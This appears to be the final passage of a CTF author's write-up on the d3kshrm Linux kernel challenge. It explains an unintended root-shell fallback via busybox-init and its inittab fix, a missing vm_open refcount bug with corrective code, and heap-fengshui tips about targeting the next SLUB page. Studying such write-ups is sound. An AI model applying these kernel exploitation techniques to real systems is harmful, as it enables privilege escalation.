How did I finally fix that? I created a revenge version of this challenge with the /etc/inittab modified: I changed the ::askfirst: entry from /bin/ash to /sbin/poweroff to patch this unintended vulnerability temporarily. A better fix might have been changing it to login ? Anyway, this taught me a lesson: a well-crafted environment might not be the most suitable one, and I should always double-check everything in the environment.
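For reference, the busybox-init change amounts to a one-line diff in /etc/inittab (simplified; the surrounding entries in the real image may differ):

```
# original: when everything else dies, busybox-init offers a shell on the console
::askfirst:/bin/ash

# revenge version: power the VM off instead of handing out a root shell
::askfirst:/sbin/poweroff
```

With ::askfirst:/bin/ash, busybox-init happily respawns a root shell on the console once the OOM killer has cleared out every other process, which is exactly the fallback the unintended solution relied on.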

What’s more…

The introduction and the flag are modified from one of my favourite advertisements, created by Halo Top. Although this video might have been created just for fun, it does give me some special feelings that I can't simply describe with words. So I chose it as the base and modified a lot to give you some meaningless sentences as the introduction and the flag : )

My inspiration for creating this challenge comes from CVE-2023-2008, whose vulnerability is also an out-of-bounds memory mapping. So to be honest it is not a pwn challenge as hard and creative as I had hoped, and I'm so sorry about that, because I always want to show you something cool and haven't presented anything really cool this time.

An important reason why I chose to modify an existing vulnerability is that I did not have much time to complete these challenges. As I have graduated from my undergraduate program, I did not pay much attention to how my junior schoolmates were preparing for this year's D^3CTF, and I only got to know that almost no pwn challenges had been created about 10 days before the competition started. Therefore I had to stand out and rush to create the pwn challenges with almost nothing new from research in my mind, to make sure the competition could be held normally as in past years. I apologize that I didn't bring something as cool as the d3kcache in 2023.

And if you pay enough attention to the kernel module itself, you may notice that I wrote another unexpected vulnerability into the reference counting of the vm_area: I FORGOT TO WRITE THE vm_open() TO INCREASE THE COUNT BUT REMEMBERED TO WRITE THE vm_close() TO DECREASE IT! This confused many players and made them waste lots of time trying to exploit it, and to be honest it's not easy to exploit, as the page is hard to use as both a user-land mapping page and a SLUB page (but if you're interested enough, maybe you can check CVE-2024-0582, which is in a similar situation; I'm not sure whether it also works for d3kshrm, so good luck). I'm sincerely sorry about that: this challenge is also a rush-made one, so I didn't check it carefully enough.
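The underlying rule is that the kernel invokes a VMA's vm_open() whenever the mapping is duplicated (e.g. across fork() or an mremap() split), and vm_close() when each copy goes away; if only vm_close() adjusts the counter, it underflows once any duplicate is torn down. A sketch of the paired callbacks (struct d3kshrm_region and the d3kshrm_* names below are illustrative, not the module's actual symbols):

```c
/* Hypothetical per-mapping state; not the real d3kshrm.ko layout. */
struct d3kshrm_region {
    atomic_t refcount;
    /* ... backing pages, size, etc. ... */
};

static void d3kshrm_vm_open(struct vm_area_struct *vma)
{
    struct d3kshrm_region *r = vma->vm_private_data;

    /* Called when the VMA is duplicated (fork(), mremap() split, ...).
     * Without this, two VMAs share one reference, and the second
     * vm_close() drops the count below zero. */
    atomic_inc(&r->refcount);
}

static void d3kshrm_vm_close(struct vm_area_struct *vma)
{
    struct d3kshrm_region *r = vma->vm_private_data;

    if (atomic_dec_and_test(&r->refcount))
        ; /* last mapping gone: release the backing pages here */
}

static const struct vm_operations_struct d3kshrm_vm_ops = {
    .open  = d3kshrm_vm_open,   /* the callback the challenge forgot */
    .close = d3kshrm_vm_close,
};
```

This is kernel-side code and obviously not runnable on its own; it only illustrates why .open and .close must always be registered as a pair when they manage a shared reference count.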

For the whole competition, only the player Tplus from the MNGA team solved it with the expected solution. CONGRATULATIONS TO HIM, THE ONLY ONE WHO SOLVED IT THAT WAY DURING THE COMPETITION! And Qanux from W&M also succeeded in exploiting it with the expected solution after the competition ended (because he didn't predict that a -revenge version would be created as a fix, and went out for a big big meal after solving it with the unintended solution). Anyway, I think we should all clap and cheer for them.

And another interesting point all of you may have ignored is that new SLUB pages are allocated while the kmem_cache is being created, which means that our heap fengshui always needs to focus on the NEXT NEWLY ALLOCATED SLUB PAGES. I think that is the core reason why both Tplus and Qanux had a low success rate in their exploitation, as this key point was missing: they were focusing on the first SLUB page, while my official solution focuses on the second one. Therefore my success rate when exploiting with page-level heap fengshui is beyond 80%, and I almost never needed multiple tries while attacking the remote.

Though I still have many thoughts about Linux kernel exploitation, this passage has become too long at this moment, so let's just stop here. Anyway, I would like to thank everyone who participated in this CTF and tried to solve my challenges, no matter whether you got the flag or not. I'm still sorry that I did not present you with something as cool as the d3kcache, due to multiple reasons including limited time; I hope you won't mind : )